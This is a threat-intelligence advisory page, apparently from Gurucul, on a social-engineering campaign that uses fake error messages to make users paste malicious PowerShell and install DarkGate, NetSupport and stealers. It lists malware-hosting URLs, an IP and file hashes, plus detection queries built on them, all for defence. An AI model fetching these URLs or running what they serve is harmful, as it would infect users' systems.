From Clipboard to Compromise: A PowerShell Self-Pwn

    Sunday, July 28, 2024 In: Threat Research Print

    Date: 07/09/2024

    Severity: Medium

    Summary

    Proofpoint has noted a rise in a unique social engineering tactic prompting users to copy and paste malicious PowerShell scripts, leading to malware infections. Threat actors like TA571 and others use this method to distribute DarkGate, Matanbuchus, NetSupport, and data stealers. Whether via malspam or web browser injections, the technique involves displaying a fake error message and instructing users to execute the script in PowerShell or the Windows Run dialog box, facilitating the malware's activation.

    Indicators of Compromise (IOC) List

    URL/Domain

    http://languangjob.com/pandstvx                                                  

    http://mylittlecabbage.net/qhsddxna                                               

    http://mylittlecabbage.net/xcdttafq                                                

    https://cdn3535.shop/1.zip                               

    https://jenniferwelsh.com/header.png                                                            

    https://kostumn1.ilabserver.com/1.zip

    https://lashakhazhalia86dancer.com/c.txt

    https://oazevents.com/loader.html

    https://rtattack.baqebei1.online/df/tt

    ra-silberkuhl.com

    IP Address

    91.222.173.113

    Hash

    07e0c15adc6fcf6096dd5b0b03c20145171c00afe14100468f18f01876457c80            11909c0262563f29d28312baffb7ff027f113512c5a76bab7c5870f348ff778f                        9701fec71e5bbec912f69c8ed63ffb6dba21b9cca7e67da5d60a72139c1795d1

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

      URL/Domain

    userdomainname IN (“languangjob.com” , “mylittlecabbage.net” , “cdn3535.shop” , “jenniferwelsh.com” , "kostumn1.ilabserver.com" , "lashakhazhalia86dancer.com" , "oazevents.com" , "rtattack.baqebei1.online" , "ra-silberkuhl.com") or url IN (“http://languangjob.com/pandstvx” , “http://mylittlecabbage.net/qhsddxna” , “http://mylittlecabbage.net/xcdttafq” , “https://cdn3535.shop/1.zip” , “https://jenniferwelsh.com/header.png” , "https://kostumn1.ilabserver.com/1.zip" , "https://lashakhazhalia86dancer.com/c.txt" , "https://oazevents.com/loader.html" , "https://rtattack.baqebei1.online/df/tt" , "ra-silberkuhl.com")

    IP Address

    dstipaddress IN (“91.222.173.113”) or ipaddress IN (“91.222.173.113”) or publicipaddress IN (“91.222.173.113”) or srcipaddress IN (“91.222.173.113”)

    Hash

    sha256hash IN (“07e0c15adc6fcf6096dd5b0b03c20145171c00afe14100468f18f01876457c80” , “11909c0262563f29d28312baffb7ff027f113512c5a76bab7c5870f348ff778f” , “9701fec71e5bbec912f69c8ed63ffb6dba21b9cca7e67da5d60a72139c1795d1”)

    Reference:

    https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn

    « Previous ArticleNext Article »

    Comments

    No records to display

    Looking for Something?
    Threat Research Categories:
    Tags

    Privacy & Security StatementTerms & Conditions
    Copyright © 2025 by Gurucul - All rights reserved.